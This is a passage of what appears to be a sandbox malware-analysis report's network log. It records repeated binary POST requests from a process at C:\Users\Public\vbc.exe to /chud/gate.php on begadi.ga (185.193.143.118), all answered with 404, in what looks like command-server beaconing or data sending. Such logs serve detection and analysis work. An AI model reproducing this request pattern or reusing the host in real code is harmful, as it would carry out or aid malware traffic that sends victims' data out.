                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                28192.168.2.2249195185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:45.531713009 CET653OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:45.724093914 CET654INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:45 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                29192.168.2.2249196185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:46.000245094 CET654OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:46.197207928 CET655INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:45 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                3192.168.2.2249170185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:33.482024908 CET619OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:33.668128967 CET619INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:33 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                30192.168.2.2249197185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:46.505912066 CET656OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:46.689477921 CET656INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:46 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                31192.168.2.2249198185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:46.952497005 CET657OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:47.145210028 CET658INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:46 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                32192.168.2.2249199185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:47.436851978 CET659OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:47.628328085 CET659INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:47 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                33192.168.2.2249200185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:47.907512903 CET660OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:48.102720976 CET660INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:47 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                34192.168.2.2249201185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:48.399306059 CET661OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:48.594541073 CET662INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:48 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                35192.168.2.2249202185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:48.868225098 CET663OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:49.054697990 CET663INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:48 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                36192.168.2.2249203185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:49.345743895 CET664OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:49.538414955 CET665INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:49 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                37192.168.2.2249204185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:49.842369080 CET665OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:50.024385929 CET666INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:49 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                38192.168.2.2249205185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:50.305217981 CET667OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:50.502685070 CET667INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:50 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                39192.168.2.2249206185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:50.800059080 CET668OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:50.995313883 CET669INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:50 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                4192.168.2.2249171185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:33.982963085 CET620OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:34.172879934 CET621INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:33 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                40192.168.2.2249207185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:51.266644001 CET669OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:51.461715937 CET670INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:51 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                41192.168.2.2249208185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:51.729572058 CET671OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:51.917480946 CET671INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:51 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                42192.168.2.2249209185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:52.201844931 CET672OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:52.382858992 CET673INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:52 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                43192.168.2.2249210185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:52.681830883 CET674OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:52.881215096 CET674INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:52 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                44192.168.2.2249211185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:53.154706001 CET675OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:53.346194029 CET676INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:52 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                45192.168.2.2249212185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:53.619537115 CET676OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:53.817548990 CET677INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:53 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                46192.168.2.2249213185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:54.095933914 CET678OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:54.282756090 CET678INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:53 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                47192.168.2.2249214185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:54.563018084 CET679OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:54.753853083 CET680INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:54 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                48192.168.2.2249215185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:55.018162966 CET680OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:55.203334093 CET681INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:54 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                49192.168.2.2249216185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:55.468060017 CET682OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:57.629524946 CET682INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:55 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                5192.168.2.2249172185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:34.470274925 CET621OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:34.668154001 CET622INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:34 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                50192.168.2.2249217185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:58.210022926 CET683OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:58.403531075 CET684INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:58 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                51192.168.2.2249218185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:58.669352055 CET685OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:58.864826918 CET685INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:58 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                52192.168.2.2249219185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:59.144565105 CET686OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:59.334280014 CET687INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:58 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                53192.168.2.2249220185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:59.604248047 CET687OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:33:59.791795015 CET688INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:59 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                54192.168.2.2249221185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:34:00.066545963 CET689OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:34:00.256094933 CET689INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:33:59 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                55192.168.2.2249222185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:34:00.524930000 CET690OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:34:00.710942030 CET691INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:34:00 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                56192.168.2.2249223185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:34:00.993901014 CET691OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:34:01.177423000 CET692INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:34:00 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                57192.168.2.2249224185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:34:01.452553988 CET693OUTPOST /chud/gate.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: begadi.ga
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: B39EF212
                Content-Length: 149
                Connection: close
                Dec 21, 2020 08:34:01.638468981 CET693INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 21 Dec 2020 07:34:01 GMT
                Content-Type: text/html; charset=UTF-8
                Content-Length: 23
                Connection: close
                X-Powered-By: PHP/7.3.24RC1
                Status: 404 Not Found
